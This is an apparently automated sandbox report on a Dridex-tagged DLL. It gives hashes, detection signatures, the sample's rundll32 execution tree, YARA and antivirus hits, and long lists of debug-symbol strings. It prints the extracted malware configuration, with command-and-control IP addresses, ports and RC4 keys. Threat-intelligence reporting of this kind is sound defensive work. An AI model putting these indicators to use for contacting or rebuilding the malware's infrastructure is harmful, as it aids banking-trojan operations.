Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 3c271eae_by_Libranalysis.dll

Overview

General Information

Sample Name:3c271eae_by_Libranalysis.dll
Analysis ID:404285
MD5:3c271eae5a3a2817cfd8704f75fdf405
SHA1:03b821b5d8b5416900245a05fce8541a21b6da7c
SHA256:dbd00287fe0c78430fee81ec6333b9c9b1863b7c62ac305de627ce6ca9fb314e
Tags:Dridex
Infos:

Most interesting Screenshot:

Detection

Dridex
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Dridex unpacked file
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Tries to detect sandboxes / dynamic malware analysis system (file name check)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 4240 cmdline: loaddll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll' MD5: 542795ADF7CC08EFCF675D65310596E8)
    • cmd.exe (PID: 5632 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5648 cmdline: rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • WerFault.exe (PID: 6092 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 764 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 5100 cmdline: rundll32.exe C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll,LoxmtYt MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 5932 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 888 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 644 cmdline: rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',DllCanUnloadNow MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 396 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 752 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 6004 cmdline: rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',DllGetClassObject MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 3520 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 756 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 2908 cmdline: rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiAddFileToInstance MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5332 cmdline: rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiAddParameter MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 5492 cmdline: rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiCancel MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 3760 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 764 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Dridex

{"Version": 40112, "C2 list": ["193.200.130.181:443", "95.138.161.226:2303", "167.114.113.13:4125"], "RC4 keys": ["MqW38NQIO70GhjGOOvjtl5AwyenW6A8fcZ", "xeMr6QHn7uRk1D2ChU8OuyaRFUZJZZHUIgxCzaPXtOkjmhTMtNxfWU8nlnD7q009ahEI51R1"]}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_1790f1d2\Report.werSUSP_WER_Critical_HeapCorruptionDetects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)Florian Roth
  • 0x11c:$a1: ReportIdentifier=
  • 0x19e:$a1: ReportIdentifier=
  • 0x77c:$a2: .Name=Fault Module Name
  • 0x92a:$s1: c0000374
C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_01d168c7\Report.werSUSP_WER_Critical_HeapCorruptionDetects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation)Florian Roth
  • 0x11c:$a1: ReportIdentifier=
  • 0x19e:$a1: ReportIdentifier=
  • 0x77a:$a2: .Name=Fault Module Name
  • 0x928:$s1: c0000374

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.578383295.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
    0000000D.00000002.659180073.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
      00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
        00000012.00000002.660063361.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
          00000011.00000002.578360981.0000000010001000.00000020.00020000.sdmpJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            15.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
              13.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                16.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                  17.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                    18.2.rundll32.exe.10000000.3.unpackJoeSecurity_Dridex_1Yara detected Dridex unpacked fileJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 15.2.rundll32.exe.10000000.3.unpackMalware Configuration Extractor: Dridex {"Version": 40112, "C2 list": ["193.200.130.181:443", "95.138.161.226:2303", "167.114.113.13:4125"], "RC4 keys": ["MqW38NQIO70GhjGOOvjtl5AwyenW6A8fcZ", "xeMr6QHn7uRk1D2ChU8OuyaRFUZJZZHUIgxCzaPXtOkjmhTMtNxfWU8nlnD7q009ahEI51R1"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 3c271eae_by_Libranalysis.dllMetadefender: Detection: 21%Perma Link
                      Source: 3c271eae_by_Libranalysis.dllReversingLabs: Detection: 27%
                      Machine Learning detection for sampleShow sources
                      Source: 3c271eae_by_Libranalysis.dllJoe Sandbox ML: detected
                      Source: 17.2.rundll32.exe.7b0000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 15.2.rundll32.exe.560000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 0.2.loaddll32.exe.b40000.1.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 16.2.rundll32.exe.9e0000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 3.2.rundll32.exe.850000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 18.2.rundll32.exe.d90000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 13.2.rundll32.exe.b90000.1.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 2.2.rundll32.exe.2fc0000.2.unpackAvira: Label: TR/ATRAPS.Gen2
                      Source: 3c271eae_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: 3c271eae_by_Libranalysis.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: dnsapi.pdbF source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdbnq source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.424911525.0000000002A92000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.590103743.0000000002EA1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.592752094.00000000047CB000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb#dc source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb, source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.588098874.0000000002E9B000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb! source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb~ source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: opengl32.pdbl source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb3 source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb' source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb8 source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbX source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.423591311.0000000002A98000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.589251650.0000000003399000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: opengl32.pdbv source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: ws2_32.pdbx source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdbA source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: opengl32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdbO source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdbk source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbi source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb] source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: nsi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: ClusApi.pdb@q source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb0 source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdbb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdbk source: WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb/d source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdbW source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb[ source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb| source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb|, source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: opengl32.pdb5 source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: FGERN.pdb source: 3c271eae_by_Libranalysis.dll
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.588054272.0000000002E95000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.424911525.0000000002A92000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.590103743.0000000002EA1000.00000004.00000001.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbhq source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdbc source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb+ source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: a'pjr*pCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000C.00000002.574931083.0000000000632000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb)d source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: ClusApi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: glu32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
